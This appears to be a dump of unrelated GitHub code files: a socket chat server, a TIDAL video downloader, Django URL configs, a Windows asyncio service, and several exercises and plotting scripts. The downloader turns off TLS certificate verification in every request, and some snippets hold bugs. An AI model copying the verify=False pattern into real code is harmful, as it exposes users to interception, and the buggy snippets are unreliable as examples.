VI_stat=VI_stat).selection()\n\t\t\t\tS_knock = knockoff_selection.S\n\n\t\t\t\tfdr_knock = 100*utils.FDR(S_knock, true_index)\n\t\t\t\tpower_knock = 100*utils.power(S_knock, true_index)\n\t\t\t\twith open('{}-{}.txt'.format(selection_method, type), 'a') as f:\n\t\t\t\t\tprint('------------Knockoff ({})-------------'.format(modeling[\"model\"]), file=f)\n\t\t\t\t\tprint(selection_method +\"-\"+ optimization +\"-\"+ modeling[\"model\"] +\"-\"+ modeling[\"params\"] +\"-\"+ VI_stat, file=f)\n\t\t\t\t\tprint(\"FDR: \" +str(fdr_knock) + \"%\", file=f)\n\t\t\t\t\tprint(\"power: \"+str(power_knock) + \"%\", file=f)\n\nf.close()\n\nexit()\nsplit_type = [[\"splitting\"], [\"sampling\", 3, 3]]\nprob = .5\nselection_method = [\"knockoff\", \"DSS\", 
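\"MSS\"]\n# note: utils.FDR and utils.power are assumed to return, respectively, the share of\n# selected indices falling outside true_index and the share of true_index recovered;\n# the 100* factors above just report both as percentages.\nselection_method = [\"knockoff\", \"DSS\", 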
\"MSS\"]","repo_name":"mehdirostami/feature_selection_fdr","sub_path":"tests/knockoff_classification.py","file_name":"knockoff_classification.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"23675824178","text":"import sys \n# 유클리드 호제법 최대공약수 (b, a%b)를 나눈 값 중 0 이 나온것과 같다.\nN, M = map(int, input().split(' '))\ndef gcd(a,b):\n while a > 0:\n r = a%b \n if r == 0:\n return b \n else:\n a = b \n b = r \ndef lcm(a,b): # 최소공배수는 두 수의 곱을 최대공약수로 나눈 것과 같다.\n return int((a*b)/ gcd(a,b))\nif N < M:\n N, M = M, N\nprint(N,M)\nprint(gcd(N,M))\n# print(lcm(N, M))","repo_name":"amo33/study_projects","sub_path":"Study/python_start/2609.py","file_name":"2609.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"5592643501","text":"import socket\nimport sys\nimport threading\n\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n\n\nif len(sys.argv) != 2:\n print('Arguments are incorrect - Please use script Port Number')\n exit()\n\n\nport = int(sys.argv[1])\n\nsock.bind((\"0.0.0.0\", port))\n\nsock.listen(10)\n\nclients = []\n\n\n\ndef thread(connect, add):\n connect.send(\"Welcome to this interesting chatroom!\")\n while True:\n try:\n message = connection.recv(1024)\n if message:\n print (add[0] + \" \" + message)\n message_to_send = add[0] + \" \" + message\n broadcast(message_to_send, connect)\n else:\n remove(connect)\n except ValueError:\n continue\n\ndef broadcast(message, connect):\n for client in clients:\n if client != connect:\n try:\n client.send(message)\n except:\n client.close()\n remove(client)\n\ndef remove(client):\n if client in clients:\n clients.remove(client)\n\nwhile True:\n connection, address = sock.accept()\n clients.append(connection)\n\n print (address[0] + \" has been connected!\")\n\n thread = threading.Thread(target = thread, args = (connection, address))\n thread.daemon = True\n thread.start()\n\nconnection.close()\nsock.close()","repo_name":"ribhavh/ChatRoom---Python","sub_path":"chatServer.py","file_name":"chatServer.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41108363804","text":"\"\"\"\nconstants.py\n\nStore constants relating to the external authentication backend.\n\"\"\"\n\n# Base urls.\nAUTH_BASE_URL = \"https://titandash.net\"\nAUTH_API_URL = \"/api\"\n\n# Endpoints.\nAUTH_AUTHENTICATE_ENDPOINT = \"/authenticate\"\nAUTH_STATE_ENDPOINT = \"/state\"\nAUTH_SIGNUP_ENDPOINT = \"/auth/register\"\nAUTH_ACCOUNT_ENDPOINT = \"/account\"\nAUTH_RELEASE_ENDPOINT = \"/release\"\n\n# Urls.\nAUTH_AUTHENTICATE_URL = \"{base}{api}{authenticate}\".format(base=AUTH_BASE_URL, api=AUTH_API_URL, authenticate=AUTH_AUTHENTICATE_ENDPOINT)\nAUTH_STATE_URL = \"{base}{api}{state}\".format(base=AUTH_BASE_URL, api=AUTH_API_URL, state=AUTH_STATE_ENDPOINT)\nAUTH_SIGNUP_URL = \"{base}{signup}\".format(base=AUTH_BASE_URL, signup=AUTH_SIGNUP_ENDPOINT)\nAUTH_ACCOUNT_URL = \"{base}{account}\".format(base=AUTH_BASE_URL, account=AUTH_ACCOUNT_ENDPOINT)\nAUTH_RELEASE_URL = \"{base}{api}{release}\".format(base=AUTH_BASE_URL, api=AUTH_API_URL, 
release=AUTH_RELEASE_ENDPOINT)\n","repo_name":"hohenheim52/titandash","sub_path":"titanbot/titanauth/authentication/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29766188545","text":"import os\nimport re\nimport shutil\nimport unicodedata\n\nimport ffmpeg\nimport requests\nfrom mutagen.easymp4 import EasyMP4\nfrom mutagen.mp4 import MP4Cover\nfrom mutagen.mp4 import MP4Tags\n\n# Needed for Windows tagging support\nMP4Tags._padding = 0\n\n\ndef normalize_key(s):\n # Remove accents from a given string\n return ''.join(c for c in unicodedata.normalize('NFD', s) if unicodedata.category(c) != 'Mn')\n\n\ndef parse_master_playlist(masterurl: str):\n content = str(requests.get(masterurl, verify=False).content)\n pattern = re.compile(r\"(?<=RESOLUTION=)[0-9]+x[0-9]+\")\n resolution_list = pattern.findall(content)\n pattern = re.compile(r\"(?<=http).+?(?=\\\\n)\")\n plist = pattern.findall(content)\n playlists = [{'height': int(resolution_list[i].split('x')[1]),\n 'url': \"http\" + plist[i]} for i in range(len(plist))]\n\n return sorted(playlists, key=lambda k: k['height'], reverse=True)\n\n\ndef parse_playlist(url: str):\n content = requests.get(url, verify=False).content\n pattern = re.compile(r\"(?<=http).+?(?=\\\\n)\")\n plist = pattern.findall(str(content))\n urllist = []\n for item in plist:\n urllist.append(\"http\" + item)\n\n return urllist\n\n\ndef download_file(urllist: list, part: int, filename: str):\n if os.path.isfile(filename):\n # print('\\tFile {} already exists, skipping.'.format(filename))\n return None\n\n r = requests.get(urllist[part], stream=True, verify=False)\n try:\n total = int(r.headers['content-length'])\n except KeyError:\n return False\n\n with open(filename, 'wb') as f:\n cc = 0\n for chunk in r.iter_content(chunk_size=1024):\n cc += 1024\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n f.close()\n\n\ndef print_video_info(track_info: dict):\n line = '\\tTitle: {0}\\n\\tArtist: {1}\\n\\tType: {2}\\n\\tResolution: {3}'.format(track_info['title'],\n track_info['artist']['name'],\n track_info['type'],\n track_info['resolution'])\n try:\n print(line)\n except UnicodeEncodeError:\n line = line.encode('ascii', 'replace').decode('ascii')\n print(line)\n print('\\t----')\n\n\ndef download_video_artwork(image_id: str, where: str):\n url = 'https://resources.tidal.com/images/{0}/{1}x{2}.jpg'.format(\n image_id.replace('-', '/'), 1280, 720)\n\n r = requests.get(url, stream=True, verify=False)\n\n try:\n total = int(r.headers['content-length'])\n except KeyError:\n return False\n with open(where, 'wb') as f:\n cc = 0\n for chunk in r.iter_content(chunk_size=1024):\n cc += 1024\n print(\n \"\\tDownload progress: {0:.0f}%\".format((cc / total) * 100),\n end='\\r')\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n print()\n return True\n\n\ndef tags(video_info: dict, tagger=None, ftype=None):\n if tagger is None:\n tagger = {'id': video_info['id'], 'quality': ' [' + video_info['quality'][4:] + ']'}\n\n tagger['title'] = video_info['title']\n tagger['artist'] = video_info['artist']['name']\n if ftype:\n tagger['tracknumber'] = str(video_info['trackNumber']).zfill(2) + '/' + str(video_info['volumeNumber'])\n else:\n tagger['tracknumber'] = str(video_info['trackNumber']).zfill(2)\n tagger['discnumber'] = str(video_info['volumeNumber'])\n\n if 'explicit' in video_info:\n if ftype:\n tagger['explicit'] = 
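b'\\x01' if video_info['explicit'] else b'\\x02'\n # iTunes 'rtng' advisory-rating atom: 1 = explicit, 2 = clean (0 = none)\n tagger['explicit'] = 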
b'\\x01' if video_info['explicit'] else b'\\x02'\n else:\n tagger['explicit'] = ' [E]' if video_info['explicit'] else ''\n\n if video_info['releaseDate']:\n # TODO: less hacky way of getting the year?\n tagger['date'] = str(video_info['releaseDate'][:4])\n\n return tagger\n\n\ndef tag_video(file_path: str, track_info: dict, credits_dict: dict, album_art_path: str):\n tagger = EasyMP4(file_path)\n tagger.RegisterTextKey('explicit', 'rtng')\n\n # Add tags to the EasyMP4 tagger\n tags(track_info, tagger, ftype='mp4')\n\n pic = None\n with open(album_art_path, 'rb') as f:\n pic = MP4Cover(f.read())\n tagger.RegisterTextKey('covr', 'covr')\n tagger['covr'] = [pic]\n\n if credits_dict:\n for key, value in credits_dict.items():\n key = normalize_key(key)\n # Create a new freeform atom and set the contributors in bytes\n tagger.RegisterTextKey(key, '----:com.apple.itunes:' + key)\n tagger[key] = [bytes(con, encoding='utf-8') for con in value]\n\n tagger.save(file_path)\n\n\ndef download_stream(folder_path: str, file_name: str, url: str, resolution: int, video_info: dict, credits_dict: dict):\n tmp_folder = os.path.join(folder_path, 'tmp')\n playlists = parse_master_playlist(url)\n urllist = []\n\n for playlist in playlists:\n if resolution >= playlist['height']:\n video_info['resolution'] = playlist['height']\n urllist = parse_playlist(playlist['url'])\n break\n\n if len(urllist) <= 0:\n print('Error: list of URLs is empty!')\n return False\n\n print_video_info(video_info)\n\n if not os.path.isdir(tmp_folder):\n os.makedirs(tmp_folder)\n\n filelist_loc = os.path.join(tmp_folder, 'filelist.txt')\n\n if os.path.exists(filelist_loc):\n os.remove(filelist_loc)\n\n filename = \"\"\n for i in range(len(urllist)):\n try:\n filename = os.path.join(tmp_folder, str(i).zfill(3) + '.ts')\n download_file(urllist, i, filename)\n with open(filelist_loc, 'a') as f:\n f.write(\"file '\" + str(i).zfill(3) + '.ts' + \"'\\n\")\n percent = i / (len(urllist) - 1) * 100\n print(\"\\tDownload progress: {0:.0f}%\".format(percent), end='\\r')\n # print(percent)\n \n # Delete partially downloaded file on keyboard interrupt\n except KeyboardInterrupt:\n if os.path.isfile(filename):\n print('\\tDeleting partially downloaded file ' + str(filename))\n os.remove(filename)\n raise\n # print(\"\\tDownload progress: {0:.0f}%\".format(percent), end='\\r')\n print(\"\\n\\tDownload succeeded!\")\n\n file_path = os.path.join(folder_path, file_name + '.mp4')\n\n (\n ffmpeg\n .input(filelist_loc, format='concat', safe=0)\n .output(file_path, vcodec='copy', acodec='copy', loglevel='warning')\n .overwrite_output()\n .run()\n )\n print('\\tConcatenation succeeded!')\n shutil.rmtree(tmp_folder)\n\n print('\\tDownloading album art ...')\n aa_location = os.path.join(folder_path, 'Cover.jpg')\n if not os.path.isfile(aa_location):\n if not download_video_artwork(video_info['imageId'], aa_location):\n aa_location = None\n\n print('\\tTagging video file...')\n tag_video(file_path, video_info, credits_dict, aa_location)\n","repo_name":"Dniel97/RedSea","sub_path":"redsea/videodownloader.py","file_name":"videodownloader.py","file_ext":"py","file_size_in_byte":7114,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"67"} +{"seq_id":"40402012908","text":"from django.conf.urls import include, url\nfrom rest_framework.routers import DefaultRouter\nfrom .views import (\n BarViewSet, BarsFavoriteAPIView, BarsPromotionViewSet\n)\n\napp_name = 'bars'\n\nrouter = DefaultRouter()\nrouter.register(r'bars', BarViewSet) 
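# DefaultRouter generates the standard ViewSet routes here -- roughly GET/POST\n# /bars/ and GET/PUT/PATCH/DELETE /bars/{lookup}/ (a sketch of DRF's defaults;\n# the exact set depends on which actions the ViewSet implements).\n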
#Retrieve & List & Create Bar\nrouter.register(r'promotions', BarsPromotionViewSet)\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n url(r'^bars/(?P[-\\w]+)/favorite/?$',BarsFavoriteAPIView.as_view()),\n\n]\n","repo_name":"alexzarazuaa/SeekBar","sub_path":"backend/bars/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"75418070293","text":"from helper import FileSystem \ndef main():\n fs = FileSystem(\"/home/ritwiz/Desktop/commvault\")\n\n while True:\n print(\"Options:\")\n print(\"1. Create File\")\n print(\"2. Edit File\")\n print(\"3. Delete File\")\n print(\"4. Get File Details\")\n print(\"5. Revert to Version\")\n print(\"6. Copy File\")\n print(\"7. Move File\")\n print(\"8. Append To File\")\n print(\"9. Quit\")\n\n choice = input(\"Enter your choice: \")\n\n if choice == \"1\":\n file_name = input(\"Enter the file name: \")\n content = input(\"Enter the file content: \")\n fs.create_file(file_name, content)\n elif choice == \"2\":\n file_name = input(\"Enter the file name: \")\n new_content = input(\"Enter the new content: \")\n fs.edit_file(file_name, new_content)\n elif choice == \"3\":\n file_name = input(\"Enter the file name: \")\n fs.delete_file(file_name)\n elif choice == \"4\":\n file_name = input(\"Enter the file name: \")\n fs.get_details(file_name)\n elif choice == \"5\":\n file_name = input(\"Enter the file name: \")\n version_number = int(input(\"Enter the version number: \"))\n fs.revert_to_version(file_name, version_number)\n elif choice == \"6\":\n file_name = input(\"Enter the file name: \")\n new_path = input(\"Enter the destination path: \")\n fs.copy_file(file_name, new_path)\n elif choice == \"7\":\n file_name = input(\"Enter the file name: \")\n new_path = input(\"Enter the destination path: \")\n fs.move_file(file_name, new_path)\n elif choice == \"8\":\n file_name = input(\"Enter the file name: \")\n new_content = input(\"Enter the new content which is to be appended: \")\n fs.append_to_file(file_name, new_content)\n elif choice =='9':\n break\n else:\n print(\"Invalid choice. Please select a valid option.\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Ritwiz20/File-System-Management","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22742044550","text":"from django.conf.urls import url\nfrom . 
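import views\n\n# the (?P<id>...) groups below are passed to the views as keyword arguments,\n# e.g. /12/favorite calls views.favorite(request, id='12') under Django's url().\nfrom . 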
import views\n\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^new$', views.new),\n url(r'^create$', views.create),\n url(r'^(?P<id>\\d+)/favorite$', views.favorite),\n url(r'^(?P<id>\\d+)/popfavback$', views.popfavback),\n url(r'^(?P<id>\\d+)/remove$', views.remove),\n url(r'^(?P<id>\\d+)/delete$', views.delete),\n url(r'^logout$', views.logout)\n] \n","repo_name":"meltedfork/Django","sub_path":"more_courses/apps/coursefavs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34006925124","text":"\"\"\"\n middleware\n\"\"\"\nfrom django.utils.deprecation import MiddlewareMixin\nfrom .exception import *\nfrom django.http import JsonResponse\n\nclass ExceptionHandleMiddleware(MiddlewareMixin):\n def process_exception(self, request, exception):\n if isinstance(exception, ParamError):\n response = JsonResponse(\n status=400,\n data=dict(\n status_code=400,\n msg=exception.message,\n errors=exception.error\n )\n )\n return response\n\n if isinstance(exception, PermError):\n response = JsonResponse(status=403, data=dict(status_code=401, msg=exception.message))\n return response\n\n if isinstance(exception, NotFoundError):\n response = JsonResponse(status=404, data=dict(status_code=404, msg=exception.message))\n return response\n","repo_name":"movekj/monkey","sub_path":"backend/utils/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"2914501093","text":"import json\nimport csv\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nhandleintimes = open(\"./Metricstest/inlabtimes.csv\", 'rb')\nhandleouttimes = open(\"./Metricstest/outlabtimes.csv\", 'rb')\n\ninlabtimes = []\noutlabtimes = []\n\n\nwith handleintimes as infile:\n\tparsed = csv.reader(infile)\n\tfor row in parsed:\n\t\tinlabtimes = np.array(list(row)).astype(np.float)\n\nwith handleouttimes as infile:\n\tparsed = csv.reader(infile)\n\tfor row in parsed:\n\t\toutlabtimes = np.array(list(row)).astype(np.float)\n\nbins = np.arange(0, 1480, 10)\n\n'''\n#print len(inlabtimes)\n#print len(outlabtimes)\n#print len(inlabtimes)\n#print len(outlabtimes)\n\n\nprint np.var(inlabeff)\nprint np.var(outlabeff)\nprint np.var(inlabtimes)\nprint np.var(outlabtimes)\nprint np.var(inlabspeeds)\nprint np.var(outlabspeeds)\n\n\n#print inlabtimes\n#print outlabtimes\n\n'''\n\n\n#speed, change back when done!!!\ninlabtimes = np.array(inlabtimes)\noutlabtimes = np.array(outlabtimes)\n\nsdvinlab = np.std(inlabtimes)\nmeaninlab = np.mean(inlabtimes)\nlabel1 = [\"$\\mu$: \" + str(meaninlab) + \"\\n\" + \"$\\sigma$: \" + str(sdvinlab)]\nplt.hist(inlabtimes, bins, label = label1)\n#plt.hist(inlabtimes, bins, label = label1)\n#plt.title(\"Probability density $f(x)$ of in-lab mousepath efficiency \\n weighted by duration of mouse sequence\")\nplt.title(\"Histogram of mouse path time length in lab\")\nplt.xlabel(\"Mouse path sequence time duration\")\n#plt.ylabel(\"# of mouse path sequences\")\nplt.ylabel(\"Number of mouse path sequences\")\nplt.xticks(np.arange(0, 1480, 100), rotation = 'vertical')\nplt.legend(loc=\"best\")\nplt.show()\n#plt.savefig('./Metricgraphs/' + \"inLabPDFexcl\" + '.png')\n#plt.savefig('./Metricgraphs/' + \"PDFinLab\" + '.png')\n#plt.savefig('./Metricgraphs/' + \"WeightedinLabHist\" + '.png')\n#plt.savefig('./Metricgraphs/' + \"inLabTimeHist1\" + 
'.png')\nplt.clf()\n\nsdvoutlab = np.std(outlabtimes)\nmeanoutlab = np.mean(outlabtimes)\nlabel2 = [\"$\\mu$: \" + str(meanoutlab) + \"\\n\" + \"$\\sigma$: \" + str(sdvoutlab)]\nplt.hist(outlabtimes, bins, label = label2)\n#plt.hist(outlabtimes, bins, label = label2)\n#plt.title(\"Probability density $f(x)$ of out-of-lab mousepath efficiency \\n weighted by duration of mouse sequence\")\nplt.title(\"Histogram of mouse path time length out of lab\")\nplt.xlabel(\"Mouse path sequence time duration\")\n#plt.ylabel(\"# of mouse path sequences\")\nplt.ylabel(\"Number of mouse path sequences\")\nplt.xticks(np.arange(0, 1480, 100), rotation = 'vertical')\nplt.legend(loc=\"best\")\nplt.show()\n#plt.savefig('./Metricgraphs/' + \"OutOfLabPDFexcl\" + '.png')\n#plt.savefig('./Metricgraphs/' + \"PDFOutOfLab\" + '.png')\n#plt.savefig('./Metricgraphs/' + \"WeightedOutOfLabHist\" + '.png')\n#plt.savefig('./Metricgraphs/' + \"outLabTimeHist1\" + '.png')\nplt.clf()\n\n\n#print sdvinlab\n#print meaninlab\n#print sdvoutlab\n#print meanoutlab\n\n'''\ndata = [inlabtimes, outlabtimes]\nplt.boxplot(data, 1)\nplt.title(\"Total in lab efficiency (left) vs. Total out of lab efficiency (right)\")\nplt.ylabel('Efficiency (optimal/actual path lengths')\n#plt.savefig('./Metricgraphs/' + \"TotalBoxPlot\" + '.png')\nplt.show()\nplt.clf()\n\n'''","repo_name":"DylanDrein/Python-FYP","sub_path":"GraphsTime.py","file_name":"GraphsTime.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71972278932","text":"#!/usr/bin/env python\n# coding: utf-8\n#\n# Day 8: Space Image Format\n#\n# https://adventofcode.com/2019/day/8\n#\n# By Stefan Kruger\n\nfrom collections import Counter\nBLACK = 0\nWHITE = 1\nTRANSP = 2\n\n\ndef read_data(filename=\"data/input08.data\"):\n with open(filename) as f:\n return list(map(int, list(f.read().splitlines()[0])))\n\n\ndef make_image(xmax, ymax, digits):\n nd = (d for d in digits)\n layers = []\n while True:\n layer = [[0] * xmax for _ in range(ymax)]\n for y in range(ymax):\n for x in range(xmax):\n try:\n layer[y][x] = next(nd)\n except StopIteration:\n return layers\n layers.append(layer)\n\n\ndef checksum(layers):\n best = None\n for layer in layers:\n c = Counter()\n for row in layer:\n c.update(row)\n if best is None:\n best = c\n elif c[0] < best[0]:\n best = c\n return best[1] * best[2]\n\n\ndef value(layers, x, y):\n layer = 0\n while layers[layer][y][x] == TRANSP:\n layer += 1\n return layers[layer][y][x]\n\n\ndef decode(layers, xmax, ymax):\n image = [[0] * xmax for _ in range(ymax)]\n for y in range(ymax):\n for x in range(xmax):\n image[y][x] = value(layers, x, y)\n\n return image\n\n\ndef show(img):\n for row in img:\n s = \"\".join(list(map(str, row)))\n print(s.replace(\"0\", \" \").replace(\"1\", \"*\"))\n\n\nif __name__ == \"__main__\":\n data = read_data()\n layers = make_image(25, 6, data)\n\n print(f\"Part1: {checksum(layers)}\")\n show(decode(layers, 25, 6))\n","repo_name":"xpqz/aoc-19","sub_path":"day08.py","file_name":"day08.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11395546775","text":"from array import array\nfrom pathlib import Path\n\nimport numpy as np\nfrom MMV.Sombrero.SombreroShader import *\n\n\nclass FullScreenConstructor:\n def __init__(self, SombreroMain):\n self.SombreroMain = SombreroMain\n self.SombreroContext = self.SombreroMain.SombreroContext\n 
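# a single (pos, size) record: reserve=16 bytes is four float32s (x, y, w, h), and\n # the Rectangles geometry shader presumably expands it into a screen-covering quad.\n 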
self.VertexShader = Path(self.SombreroMain.SombreroDir/\"Constructors\"/\"RectanglesVertex.glsl\").read_text()\n self.GeometryShader = Path(self.SombreroMain.SombreroDir/\"Constructors\"/\"RectanglesGeometry.glsl\").read_text()\n self.num_vertices = 4\n self.buffer = self.SombreroContext.OpenGL_Context.buffer(reserve=16)\n self.buffer.write(array(\"f\", [0, 0, 2, 2]))\n self.once_returned_vao = False\n \n def TreatFragmentShader(self, SombreroShader):\n io_placeholder = SombreroShader.IOPlaceHolder\n IO(\"vec2\", \"OpenGLUV\", prefix = False, mode = \"i\")(io_placeholder)\n IO(\"vec2\", \"ShaderToyUV\", prefix = False, mode = \"i\")(io_placeholder)\n IO(\"vec4\", \"fragColor\", prefix = False, mode = \"o\")(io_placeholder)\n\n def vao(self):\n if self.once_returned_vao: return\n self.once_returned_vao = True\n return [(self.buffer, \"2f 2f\", \"InPos\", \"InSize\"),]\n\n def next(self):\n pass\n\n\n\nclass PianoRollConstructor:\n def __init__(self, SombreroMain, piano_roll, expect, maxkeys = 500):\n self.SombreroMain = SombreroMain\n self.SombreroContext = self.SombreroMain.SombreroContext\n self.piano_roll = piano_roll\n self.expect = expect\n self.VertexShader = Path(self.SombreroMain.SombreroDir/\"Constructors\"/\"PianoVertex.glsl\").read_text()\n self.GeometryShader = Path(self.SombreroMain.SombreroDir/\"Constructors\"/\"PianoGeometry.glsl\").read_text()\n self.buffer = self.SombreroContext.OpenGL_Context.buffer(reserve = 9 * 4 * maxkeys)\n \n def TreatFragmentShader(self, SombreroShader):\n io_placeholder = SombreroShader.IOPlaceHolder\n IO(\"vec2\", \"OpenGLUV\", prefix = False, mode = \"i\")(io_placeholder)\n IO(\"vec2\", \"ShaderToyUV\", prefix = False, mode = \"i\")(io_placeholder)\n IO(\"float\", \"note\", prefix = False, mode = \"i\")(io_placeholder)\n IO(\"float\", \"velocity\", prefix = False, mode = \"i\")(io_placeholder)\n IO(\"float\", \"channel\", prefix = False, mode = \"i\")(io_placeholder)\n IO(\"float\", \"IsPlaying\", prefix = False, mode = \"i\")(io_placeholder)\n IO(\"float\", \"IsWhite\", prefix = False, mode = \"i\")(io_placeholder)\n IO(\"vec4\", \"fragColor\", prefix = False, mode = \"o\")(io_placeholder)\n\n def vao(self):\n self.buffer.clear()\n\n instructions = self.piano_roll.generate_note_coordinates()\n\n draw = [attr for note in instructions[self.expect] for attr in note]\n self.buffer.write(array(\"f\", draw))\n self.num_vertices = 4 * len(instructions[self.expect])\n\n return (self.buffer,\n \"2f 2f 1f 1f 1f 1f 1f\",\n \"InPos\", \"InSize\", \"InNote\", \"InVelocity\", \"InChannel\", \"InIsPlaying\", \"InIsWhite\"\n ),\n\n def next(self):\n pass","repo_name":"Tremeschin/ModularMusicVisualizer","sub_path":"App/MMV/Sombrero/SombreroConstructor.py","file_name":"SombreroConstructor.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"72"} +{"seq_id":"32848431190","text":"cores = {\n 'limpar': '\\033[m',\n 'vermelho': '\\033[0;31m',\n 'verde': '\\033[0;32m',\n 'amarelo': '\\033[0;33m',\n 'azul': '\\033[0;34m',\n 'roxo': '\\033[0;35'\n}\nli = cores['limpar']\nvm = cores['vermelho']\nvd = cores['verde']\nam = cores['amarelo']\naz = cores['azul']\nrx = cores['roxo']\n\n# Minha solução\n'''\nprint('Gerador de PA')\nprint('-=' * 12)\npri = int(input('Primeiro termo: '))\nraz = int(input('Razão da PA: '))\ncont = 1\ntottermo = 0\nwhile cont != 0:\n print(f'{am}{pri}{li}', end=' → ')\n pri += raz\n cont += 1\n tottermo += 1\n if cont > 10:\n print(f'{az}PAUSA{li}')\n mais = 
int(input(f'Quantos termos você quer mostrar a mais? '))\n if mais == 0:\n cont = 0\n else:\n print(f'{am}{pri}{li}', end=' → ')\n cont -= mais - 1\n pri += raz\n tottermo += 1\nprint(f'Progressão finalizada com {vd}{tottermo}{li} termos mostrados.')\n'''\n\n# My solution, redone after the ex061 correction\nprint(f'{az}Gerador de PA')\nprint(f'{am}-={li}' * 12)\npri = int(input('Primeiro termo: '))\nraz = int(input('Razão da PA: '))\ntermo = pri\ncont = 1\nmais = 1\ntottermos = 0\nwhile cont <= 10 and mais != 0:\n print(f'{az}{termo}{li} → ', end='')\n termo += raz\n cont += 1\n tottermos += 1\n if cont > 10:\n print(f'{am}PAUSA{li}')\n mais = int(input('Quantos termos você quer mostrar a mais? '))\n if mais != 0:\n cont -= mais\nprint(f'Progressão finalizada com {vd}{tottermos}{li} termos mostrados.')\n\n# Gustavo Guanabara's solution\n'''\nprimeiro = int(input('Primeiro Termo: '))\nrazão = int(input('Razão da PA: '))\ntermo = primeiro\ncont = 1\ntotal = 0\nmais = 10\nwhile mais != 0:\n total += mais\n while cont <= total:\n print('{} → '.format(termo), end='')\n termo += razão\n cont += 1\n print('PAUSA')\n mais = int(input('Quantos termos você quer mostrar a mais? '))\nprint('Progresso finalizada com {} termos mostrados.'.format(total))\n'''\n","repo_name":"opedrovs/python","sub_path":"exercicios/ex062.py","file_name":"ex062.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"29360846092","text":"import win32serviceutil\nimport win32service\nimport win32event\nimport servicemanager\nimport asyncio\nimport functools\nimport threading\n\n\nclass AppServerSvc (win32serviceutil.ServiceFramework):\n _svc_name_ = \"TestServiceAsync\"\n _svc_display_name_ = \"Test Service with Asyncio\"\n\n def __init__(self,args):\n win32serviceutil.ServiceFramework.__init__(self,args)\n #self.hWaitStop = win32event.CreateEvent(None,0,0,None)\n self.event_loop = asyncio.get_event_loop()\n self.wait_event = asyncio.Event(loop=self.event_loop)\n #socket.setdefaulttimeout(60)\n\n @staticmethod\n def set_stop_event(event):\n with open(r\"c:\\test.txt\",\"a\") as f:\n f.write(\"setting event {0}\\n\".format(threading.current_thread().name))\n event.set()\n\n def SvcStop(self):\n self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n #win32event.SetEvent(self.hWaitStop)\n with open(r\"c:\\test.txt\",\"a\") as f:\n f.write(\"stopping {0}\\n\".format(threading.current_thread().name))\n\n self.event_loop.call_soon_threadsafe(functools.partial(AppServerSvc.set_stop_event, self.wait_event))\n\n def SvcDoRun(self):\n servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE,\n servicemanager.PYS_SERVICE_STARTED,\n (self._svc_name_,''))\n self.main()\n\n async def long_waited_job(self):\n with open(r\"c:\\test.txt\",\"a\") as f:\n f.write(\"Doing job and waiting {0}\\n\".format(threading.current_thread().name))\n await self.wait_event.wait()\n\n def main(self):\n\n with open(r\"c:\\test.txt\",\"w\") as f:\n f.write(\"started {0}\\n\".format(threading.current_thread().name))\n #win32event.WaitForSingleObject(self.hWaitStop,win32event.INFINITE)\n self.event_loop.run_until_complete(self.long_waited_job())\n self.event_loop.close()\n\n\n with open(r\"c:\\test.txt\",\"a\") as f:\n f.write(\"stopped {0}\\n\".format(threading.current_thread().name))\n \n pass\n\nif __name__ == '__main__':\n 
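# HandleCommandLine wires up the standard pywin32 service verbs, e.g.\n # 'python testservice_async.py install' followed by '... start' / '... stop'.\n 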
